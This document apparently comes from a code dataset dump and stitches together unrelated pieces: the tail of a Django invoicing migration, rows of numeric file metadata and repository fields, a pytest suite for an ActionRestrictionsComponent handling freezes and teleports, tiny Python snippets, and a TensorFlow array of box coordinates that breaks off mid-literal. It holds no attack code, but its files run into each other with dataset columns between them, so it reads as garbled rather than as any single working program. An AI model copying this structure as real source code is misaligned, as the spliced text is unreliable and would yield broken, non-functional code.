field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='order_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
),
migrations.AddField(
model_name='purchaseslineticketrectification',
name='line_ticket',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_ticketrectification_purchases', to='codenerix_invoicing.PurchasesLineTicket', verbose_name='Line ticket'),
),
migrations.AddField(
model_name='purchaseslineticketrectification',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_ticketrectification_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
),
migrations.AddField(
model_name='purchaseslineticketrectification',
name='ticket_rectification',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_ticketrectification_purchases', to='codenerix_invoicing.PurchasesTicketRectification', verbose_name='Ticket rectification'),
),
migrations.AddField(
model_name='purchaseslineticket',
name='line_albaran',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_ticket_purchases', to='codenerix_invoicing.PurchasesLineAlbaran', verbose_name='Line albaran'),
),
migrations.AddField(
model_name='purchaseslineticket',
name='product',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_ticket_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
),
migrations.AddField(
model_name='purchaseslineticket',
name='ticket',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_ticket_purchases', to='codenerix_invoicing.PurchasesTicket', verbose_name='Ticket'),
),
migrations.AddField(
model_name='purchaseslineorder',
name='line_budget',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_order_purchases', to='codenerix_invoicing.PurchasesLineBudget', verbose_name='Line budget'),
),
migrations.AddField(
model_name='purchaseslineorder',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_order_purchases', to='codenerix_invoicing.PurchasesOrder', verbose_name='Purchase order'),
),
migrations.AddField(
model_name='purchaseslineorder',
name='product',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_order_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
),
migrations.AddField(
model_name='purchaseslineinvoicerectification',
name='invoice_rectification',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoicerectification_purchases', to='codenerix_invoicing.PurchasesInvoiceRectification', verbose_name='Invoice rectification'),
),
migrations.AddField(
model_name='purchaseslineinvoicerectification',
name='line_invoice',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoicerectification_purchases', to='codenerix_invoicing.PurchasesLineInvoice', verbose_name='Line invoice'),
),
migrations.AddField(
model_name='purchaseslineinvoicerectification',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoicerectification_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
),
migrations.AddField(
model_name='purchaseslineinvoice',
name='invoice',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoice_purchases', to='codenerix_invoicing.PurchasesInvoice', verbose_name='Invoice'),
),
migrations.AddField(
model_name='purchaseslineinvoice',
name='line_albaran',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_invoice_purchases', to='codenerix_invoicing.PurchasesLineAlbaran', verbose_name='Line albaran'),
),
migrations.AddField(
model_name='purchaseslineinvoice',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoice_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
),
migrations.AddField(
model_name='purchaseslinebudget',
name='budget',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_budget_purchases', to='codenerix_invoicing.PurchasesBudget', verbose_name='Budget'),
),
migrations.AddField(
model_name='purchaseslinebudget',
name='product',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_budget_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
),
migrations.AddField(
model_name='purchaseslinealbaran',
name='albaran',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_albaran_purchases', to='codenerix_invoicing.PurchasesAlbaran', verbose_name='Albaran'),
),
migrations.AddField(
model_name='purchaseslinealbaran',
name='line_order',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_albaran_purchases', to='codenerix_invoicing.PurchasesLineOrder', verbose_name='Line orders'),
),
migrations.AddField(
model_name='purchaseslinealbaran',
name='product_unique',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_albaran_purchases', to='codenerix_products.ProductUnique', verbose_name='Product'),
),
migrations.AddField(
model_name='purchaseslinealbaran',
name='validator_user',
field=models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='line_albaran_purchases', to=settings.AUTH_USER_MODEL, verbose_name='Validator user'),
),
migrations.AddField(
model_name='purchasesinvoicerectificationdocument',
name='invoice_rectification',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoicerectificationdocument_purchases', to='codenerix_invoicing.PurchasesInvoiceRectification', verbose_name='Invoice rectification'),
),
migrations.AddField(
model_name='purchasesinvoicedocument',
name='invoice',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoicedocument_purchases', to='codenerix_invoicing.PurchasesInvoice', verbose_name='Invoice'),
),
migrations.AddField(
model_name='purchasesinvoice',
name='provider',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoice_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
),
migrations.AddField(
model_name='purchasesbudgetdocument',
name='budget',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='budgetdocument_purchases', to='codenerix_invoicing.PurchasesBudget', verbose_name='Budget'),
),
migrations.AddField(
model_name='purchasesbudget',
name='provider',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='budget_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
),
migrations.AddField(
model_name='purchasesalbarandocument',
name='albaran',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='albarandocument_purchases', to='codenerix_invoicing.PurchasesAlbaran', verbose_name='Albaran'),
),
migrations.AddField(
model_name='purchasesalbaran',
name='provider',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='albaran_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
),
migrations.AddField(
model_name='provider',
name='billing_series',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='providers', to='codenerix_invoicing.BillingSeries', verbose_name='Billing series'),
),
migrations.AddField(
model_name='provider',
name='categories',
field=models.ManyToManyField(blank=True, related_name='providers', to='codenerix_products.Category'),
),
migrations.AddField(
model_name='provider',
name='currency',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='providers', to='codenerix_payments.Currency', verbose_name='Currency'),
),
migrations.AddField(
model_name='provider',
name='type_tax',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='providers', to='codenerix_products.TypeTax', verbose_name='Type tax'),
),
migrations.AddField(
model_name='customerdocument',
name='customer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customer_documents', to='codenerix_invoicing.Customer', verbose_name='Customer'),
),
migrations.AddField(
model_name='customerdocument',
name='type_document',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customer_documents', to='codenerix_invoicing.TypeDocument', verbose_name='Type document'),
),
migrations.AddField(
model_name='customer',
name='billing_series',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='codenerix_invoicing.BillingSeries', verbose_name='Billing series'),
),
migrations.AddField(
model_name='customer',
name='currency',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='codenerix_payments.Currency', verbose_name='Currency'),
),
migrations.AddField(
model_name='customer',
name='type_tax',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='codenerix_products.TypeTax', verbose_name='Type tax'),
),
migrations.AlterUniqueTogether(
name='salesbasket',
unique_together=set([('code', 'parent_pk')]),
),
]
| 57.774704
| 230
| 0.685366
| 1,427
| 14,617
| 6.795375
| 0.094604
| 0.03795
| 0.064969
| 0.102093
| 0.85676
| 0.850366
| 0.751057
| 0.733629
| 0.733629
| 0.715582
| 0
| 0.003841
| 0.198536
| 14,617
| 252
| 231
| 58.003968
| 0.823901
| 0.004652
| 0
| 0.651639
| 1
| 0
| 0.29637
| 0.176406
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016393
| 0
| 0.032787
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a9d79e86852cfc2453d235e55ab96a44ad9aa118
| 19,659
|
py
|
Python
|
tests/ile_action_component_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 4
|
2021-02-04T03:57:52.000Z
|
2022-02-08T18:19:58.000Z
|
tests/ile_action_component_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 68
|
2021-05-06T08:52:46.000Z
|
2022-03-23T16:46:03.000Z
|
tests/ile_action_component_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 1
|
2021-02-04T03:21:57.000Z
|
2021-02-04T03:21:57.000Z
|
import pytest
from ideal_learning_env.actions_component import ActionRestrictionsComponent
from ideal_learning_env.defs import ILEConfigurationException, ILEException
def prior_scene(last_step: int = None):
scene = {
'debug': {},
'goal': {},
'performerStart':
{
'position':
{'x': 0, 'y': 0, 'z': 0}
},
'roomDimensions': {'x': 10, 'y': 3, 'z': 10}
}
if last_step:
scene['goal']['last_step'] = last_step
return scene
def test_action_restrictions_defaults():
component = ActionRestrictionsComponent({})
assert component.passive_scene is None
assert component.freezes is None
assert component.teleports is None
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
assert not hasattr(goal, 'action_list')
def test_action_restrictions_passive():
component = ActionRestrictionsComponent({
'passive_scene': True
})
assert isinstance(component.passive_scene, bool)
assert component.passive_scene
last_step = 100
scene = component.update_ile_scene(prior_scene(last_step))
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == last_step
for inner in al:
assert isinstance(inner, list)
assert len(inner) == 1
assert inner[0] == 'Pass'
def test_action_restrictions_freeze_start():
start_step = 2
component = ActionRestrictionsComponent({
'freezes': [
{
'begin': start_step
}]
})
fzs = component.get_freezes()
assert isinstance(fzs, list)
assert fzs[0].begin == start_step
assert fzs[0].end is None
scene = component.update_ile_scene(prior_scene(100))
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == 100
for idx, inner in enumerate(al):
assert isinstance(inner, list)
# Minux 1 for ordinal to index fix.
if idx >= start_step - 1:
assert len(inner) == 1
assert inner[0] == 'Pass'
else:
assert len(inner) == 0
def test_action_restrictions_freeze_start_end():
start_step = 4
end_step = 8
component = ActionRestrictionsComponent({
'freezes': [
{
'begin': start_step,
'end': end_step
}]
})
fzs = component.get_freezes()
assert isinstance(fzs, list)
assert fzs[0].begin == start_step
assert fzs[0].end == end_step
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == end_step - 1
for idx, inner in enumerate(al):
assert isinstance(inner, list)
if start_step - 1 <= idx < end_step - 1:
assert len(inner) == 1
assert inner[0] == 'Pass'
else:
assert len(inner) == 0
def test_action_restrictions_freeze_choice():
component = ActionRestrictionsComponent({
'freezes': [[
{
'begin': 1,
'end': 2
},
{
'begin': 3,
'end': 4
},
{
'begin': 5,
'end': 6
}
]]
})
fzs = component.get_freezes()
assert isinstance(fzs, list)
choice = [1, 3, 5].index(fzs[0].begin)
# Choice is the index of the choice used so we can test consistency
start = [1, 3, 5][choice]
end = [2, 4, 6][choice]
assert fzs[0].begin == start
assert fzs[0].end == end
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
choice = [1, 3, 5].index(len(al))
start = [1, 3, 5][choice]
end = [2, 4, 6][choice]
assert len(al) == start
for idx, inner in enumerate(al):
assert isinstance(inner, list)
if start - 1 <= idx < end - 1:
assert len(inner) == 1
assert inner[0] == 'Pass'
else:
assert len(inner) == 0
def test_action_restrictions_freeze_ok_overlap():
start_step = 4
mid = 6
end_step = 8
component = ActionRestrictionsComponent({
'freezes': [
{
'begin': start_step,
'end': mid
}, {
'begin': mid,
'end': end_step
}]
})
fzs = component.get_freezes()
assert isinstance(fzs, list)
assert fzs[0].begin == start_step
assert fzs[0].end == mid
assert fzs[1].begin == mid
assert fzs[1].end == end_step
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == end_step - 1
for idx, inner in enumerate(al):
assert isinstance(inner, list)
if start_step - 1 <= idx < end_step - 1:
assert len(inner) == 1
assert inner[0] == 'Pass'
else:
assert len(inner) == 0
def test_action_restrictions_freeze_gap():
start_step = 2
mid1 = 4
mid2 = 8
end_step = 12
component = ActionRestrictionsComponent({
'freezes': [
{
'begin': start_step,
'end': mid1
}, {
'begin': mid2,
'end': end_step
}]
})
fzs = component.get_freezes()
assert isinstance(fzs, list)
assert fzs[0].begin == start_step
assert fzs[0].end == mid1
assert fzs[1].begin == mid2
assert fzs[1].end == end_step
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == end_step - 1
for idx, inner in enumerate(al):
assert isinstance(inner, list)
if start_step - 1 <= idx < mid1 - 1 or mid2 - 1 <= idx < end_step - 1:
assert len(inner) == 1
assert inner[0] == 'Pass'
else:
assert len(inner) == 0
def test_action_restrictions_freeze_bad_overlap():
start_step = 2
mid = 6
end_step = 10
component = ActionRestrictionsComponent({
'freezes': [
{
'begin': start_step,
'end': mid + 1
}, {
'begin': mid - 1,
'end': end_step
}]
})
fzs = component.get_freezes()
assert isinstance(fzs, list)
assert fzs[0].begin == start_step
assert fzs[0].end == mid + 1
assert fzs[1].begin == mid - 1
assert fzs[1].end == end_step
with pytest.raises(ILEException):
component.update_ile_scene(prior_scene())
def test_action_restrictions_freeze_just_end():
end_step = 3
component = ActionRestrictionsComponent({
'freezes': [
{
'end': end_step
}]
})
fzs = component.get_freezes()
assert isinstance(fzs, list)
assert fzs[0].begin is None
assert fzs[0].end == end_step
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == end_step - 1
for idx, inner in enumerate(al):
assert isinstance(inner, list)
# minux 2 is 1 for ordinal to index and 1 for exclusiveness of end
if idx <= end_step - 2:
assert len(inner) == 1
assert inner[0] == 'Pass'
else:
assert len(inner) == 0
def test_action_restrictions_freeze_missing_start_and_end():
component = ActionRestrictionsComponent({
'freezes': [
{}]
})
fzs = component.get_freezes()
assert isinstance(fzs, list)
assert fzs[0].begin is None
assert fzs[0].end is None
with pytest.raises(ILEConfigurationException):
component.update_ile_scene(prior_scene())
def test_action_restrictions_freeze_empty_list():
component = ActionRestrictionsComponent({
'freezes': [
]
})
fzs = component.get_freezes()
assert isinstance(fzs, list)
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
assert not hasattr(goal, 'action_list')
def test_action_restriction_teleport_missing_step():
with pytest.raises(ILEException):
ActionRestrictionsComponent({
'teleports': [{
'position_x': 1,
'position_z': 2,
'rotation_y': 30
}]
})
def test_action_restriction_teleport_missing_pos_x():
step = 8
component = ActionRestrictionsComponent({
'teleports': [{
'step': step,
'position_z': 2,
'rotation_y': 30
}]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step == step
assert tps[0].position_x is None
assert tps[0].position_z == 2
assert tps[0].rotation_y == 30
with pytest.raises(ILEConfigurationException):
component.update_ile_scene(prior_scene())
def test_action_restriction_teleport_missing_pos_z():
step = 8
component = ActionRestrictionsComponent({
'teleports': [{
'step': step,
'position_x': 2,
'rotation_y': 30
}]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step == step
assert tps[0].position_z is None
assert tps[0].position_x == 2
assert tps[0].rotation_y == 30
with pytest.raises(ILEConfigurationException):
component.update_ile_scene(prior_scene())
def test_action_restriction_teleport_missing_rot_y():
step = 8
component = ActionRestrictionsComponent({
'teleports': [{
'step': step,
'position_x': 2,
'position_z': 3
}]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step == step
assert tps[0].position_z == 3
assert tps[0].position_x == 2
assert tps[0].rotation_y is None
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == step
for idx, inner in enumerate(al):
assert isinstance(inner, list)
# minux 2 is 1 for ordinal to index and 1 for exclusiveness of end
if idx == step - 1:
assert len(inner) == 1
assert inner[0] == "EndHabituation,xPosition=2,zPosition=3"
else:
assert len(inner) == 0
def test_action_restriction_teleport():
step = 3
component = ActionRestrictionsComponent({
'teleports': [{
'step': step,
'position_x': 1,
'position_z': 2,
'rotation_y': 45
}]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step == step
assert tps[0].position_x == 1
assert tps[0].position_z == 2
assert tps[0].rotation_y == 45
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == step
for idx, inner in enumerate(al):
assert isinstance(inner, list)
if step - 1 == idx:
teleport_pos = 'EndHabituation,xPosition=1,zPosition=2,yRotation=45' # noqa: E501
assert len(inner) == 1
assert inner[0] == teleport_pos
else:
assert len(inner) == 0
def test_action_restriction_teleport_choice():
component = ActionRestrictionsComponent({
'teleports': [[{
'step': 3,
'position_x': 1,
'position_z': 2,
'rotation_y': 45
}, {
'step': 6,
'position_x': 2,
'position_z': 4,
'rotation_y': 90
}]]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step in [3, 6]
assert tps[0].position_x in [1, 2]
assert tps[0].position_z in [2, 4]
assert tps[0].rotation_y in [45, 90]
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) in [3, 6]
num_end_hab = 0
for idx, inner in enumerate(al):
assert isinstance(inner, list)
if idx in [2, 5] and len(inner) == 1:
teleport_pos = [
'EndHabituation,xPosition=1,zPosition=2,yRotation=45',
'EndHabituation,xPosition=2,zPosition=4,yRotation=90'
]
num_end_hab += 1
assert inner[0] in teleport_pos
else:
assert len(inner) == 0
assert num_end_hab == 1
def test_action_restriction_teleport_multi():
step1 = 3
step2 = 5
step3 = 9
component = ActionRestrictionsComponent({
'teleports': [{
'step': step1,
'position_x': 1,
'position_z': 2,
'rotation_y': 45
}, {
'step': step2,
'rotation_y': 90
}, {
'step': step3,
'position_x': -3,
'position_z': -1
}]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step == step1
assert tps[0].position_x == 1
assert tps[0].position_z == 2
assert tps[0].rotation_y == 45
assert tps[1].step == step2
assert tps[1].position_x is None
assert tps[1].position_z is None
assert tps[1].rotation_y == 90
assert tps[2].step == step3
assert tps[2].position_x == -3
assert tps[2].position_z == -1
assert tps[2].rotation_y is None
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == step3
for idx, inner in enumerate(al):
assert isinstance(inner, list)
if step1 - 1 == idx:
teleport_pos = 'EndHabituation,xPosition=1,zPosition=2,yRotation=45' # noqa: E501
assert len(inner) == 1
assert inner[0] == teleport_pos
elif step2 - 1 == idx:
teleport_pos = 'EndHabituation,yRotation=90'
assert len(inner) == 1
assert inner[0] == teleport_pos
elif step3 - 1 == idx:
teleport_pos = 'EndHabituation,xPosition=-3,zPosition=-1' # noqa: E501
assert len(inner) == 1
assert inner[0] == teleport_pos
else:
assert len(inner) == 0
def test_action_restriction_teleport_multi_overwrite_error():
step = 2
component = ActionRestrictionsComponent({
'teleports': [{
'step': step,
'position_x': 1,
'position_z': 2,
'rotation_y': 45
}, {
'step': step,
'rotation_y': 90
}]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step == step
assert tps[0].position_x == 1
assert tps[0].position_z == 2
assert tps[0].rotation_y == 45
assert tps[1].step == step
assert tps[1].position_x is None
assert tps[1].position_z is None
assert tps[1].rotation_y == 90
with pytest.raises(ILEException):
component.update_ile_scene(prior_scene())
def test_action_restriction_freeze_teleport_combined():
tstep = 2
start = 5
end = 8
component = ActionRestrictionsComponent({
'teleports': [{
'step': tstep,
'position_x': 1,
'position_z': 2,
'rotation_y': 45
}],
'freezes': [
{
'begin': start,
'end': end
}
]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step == tstep
assert tps[0].position_x == 1
assert tps[0].position_z == 2
assert tps[0].rotation_y == 45
fzs = component.get_freezes()
assert fzs[0].begin == start
assert fzs[0].end == end
scene = component.update_ile_scene(prior_scene())
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == max(end - 1, tstep)
for idx, inner in enumerate(al):
assert isinstance(inner, list)
if tstep - 1 == idx:
teleport_pos = 'EndHabituation,xPosition=1,zPosition=2,yRotation=45' # noqa: E501
assert len(inner) == 1
assert inner[0] == teleport_pos
elif start - 1 <= idx < end:
assert len(inner) == 1
assert inner[0] == 'Pass'
else:
assert len(inner) == 0
def test_action_restriction_freeze_teleport_overwrite_error():
step = 2
component = ActionRestrictionsComponent({
'teleports': [{
'step': step,
'position_x': 1,
'position_z': 2,
'rotation_y': 45
}],
'freezes': [
{
'begin': step,
'end': step + 3
}
]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step == step
assert tps[0].position_x == 1
assert tps[0].position_z == 2
assert tps[0].rotation_y == 45
fzs = component.get_freezes()
assert fzs[0].begin == step
assert fzs[0].end == step + 3
with pytest.raises(ILEException):
component.update_ile_scene(prior_scene())
def test_action_restriction_passive_teleport():
step = 2
component = ActionRestrictionsComponent({
'passive_scene': True,
'teleports': [{
'step': step,
'position_x': 1,
'position_z': 2,
'rotation_y': 45
}]
})
tps = component.get_teleports()
assert isinstance(tps, list)
assert tps[0].step == step
assert tps[0].position_x == 1
assert tps[0].position_z == 2
assert tps[0].rotation_y == 45
assert component.get_passive_scene()
scene = component.update_ile_scene(prior_scene(100))
goal = scene['goal']
assert isinstance(goal, dict)
al = goal['action_list']
assert isinstance(al, list)
assert len(al) == 100
for idx, inner in enumerate(al):
assert isinstance(inner, list)
if step - 1 == idx:
teleport_pos = 'EndHabituation,xPosition=1,zPosition=2,yRotation=45' # noqa: E501
assert inner[0] == teleport_pos
else:
assert inner[0] == 'Pass'
assert len(inner) == 1
def test_action_restriction_passive_freeze_error():
step = 2
component = ActionRestrictionsComponent({
'passive_scene': True,
'freezes': [
{
'begin': step,
'end': step + 3
}
]
})
assert component.get_passive_scene()
fzs = component.get_freezes()
assert fzs[0].begin == step
assert fzs[0].end == step + 3
with pytest.raises(ILEConfigurationException):
component.update_ile_scene(prior_scene(100))
| 27.688732
| 94
| 0.569917
| 2,291
| 19,659
| 4.727193
| 0.056307
| 0.09012
| 0.036934
| 0.046722
| 0.851247
| 0.808772
| 0.778116
| 0.748846
| 0.726962
| 0.717267
| 0
| 0.030986
| 0.3138
| 19,659
| 709
| 95
| 27.727786
| 0.771831
| 0.014446
| 0
| 0.726678
| 0
| 0
| 0.077253
| 0.021224
| 0
| 0
| 0
| 0
| 0.337152
| 1
| 0.03928
| false
| 0.032733
| 0.00491
| 0
| 0.045827
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a9f157631f5f873a5efe7847fb04440419279c4b
| 71
|
py
|
Python
|
python/baseline/dy/__init__.py
|
domyounglee/baseline
|
2261abfb7e770cc6f3d63a7f6e0015238d0e11f8
|
[
"Apache-2.0"
] | null | null | null |
python/baseline/dy/__init__.py
|
domyounglee/baseline
|
2261abfb7e770cc6f3d63a7f6e0015238d0e11f8
|
[
"Apache-2.0"
] | null | null | null |
python/baseline/dy/__init__.py
|
domyounglee/baseline
|
2261abfb7e770cc6f3d63a7f6e0015238d0e11f8
|
[
"Apache-2.0"
] | 3
|
2019-05-27T04:52:21.000Z
|
2022-02-15T00:22:53.000Z
|
from baseline.dy.dynety import *
from baseline.dy.transformer import *
| 23.666667
| 37
| 0.802817
| 10
| 71
| 5.7
| 0.6
| 0.421053
| 0.491228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 38
| 35.5
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e7890d5743d1ceba1c1edcb69d8ca35595903963
| 99
|
py
|
Python
|
past_archive/swexpert/1938(arithmeticOperation).py
|
DongHyunByun/algorithm_practice
|
c726c69d35306d23467f4af6e10f2db6fdc68234
|
[
"MIT"
] | null | null | null |
past_archive/swexpert/1938(arithmeticOperation).py
|
DongHyunByun/algorithm_practice
|
c726c69d35306d23467f4af6e10f2db6fdc68234
|
[
"MIT"
] | null | null | null |
past_archive/swexpert/1938(arithmeticOperation).py
|
DongHyunByun/algorithm_practice
|
c726c69d35306d23467f4af6e10f2db6fdc68234
|
[
"MIT"
] | null | null | null |
a=list(map(int,input().split()))
print(f"{a[0]+a[1]}\n{a[0]-a[1]}\n{a[0]*a[1]}\n{int(a[0]/a[1])}")
| 33
| 65
| 0.494949
| 28
| 99
| 1.75
| 0.392857
| 0.163265
| 0.244898
| 0.326531
| 0.306122
| 0.306122
| 0.306122
| 0.306122
| 0.306122
| 0.306122
| 0
| 0.082474
| 0.020202
| 99
| 2
| 66
| 49.5
| 0.42268
| 0
| 0
| 0
| 0
| 0.5
| 0.555556
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
99b5f4959a0dbe73d89bba0e34fd6acfa4404e70
| 1,922
|
py
|
Python
|
test.py
|
anmolgaba21/ATCC-Collision
|
7a76e10d38059bf6820bc7fca800320c6e703be4
|
[
"MIT"
] | null | null | null |
test.py
|
anmolgaba21/ATCC-Collision
|
7a76e10d38059bf6820bc7fca800320c6e703be4
|
[
"MIT"
] | null | null | null |
test.py
|
anmolgaba21/ATCC-Collision
|
7a76e10d38059bf6820bc7fca800320c6e703be4
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow as tf
array=tf.constant([[ 306., 215., 515., 375.],
[ 685., 188., 951., 380.],
[ 850., 216., 1046., 348.],
[ 713., 71., 950., 227.],
[ 163., 204., 386., 322.],
[ 775., 310., 1052., 488.],
[ 953., 217., 1188., 367.],
[ 518., 164., 636., 327.],
[ 603., 145., 752., 272.],
[ 626., 125., 733., 298.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
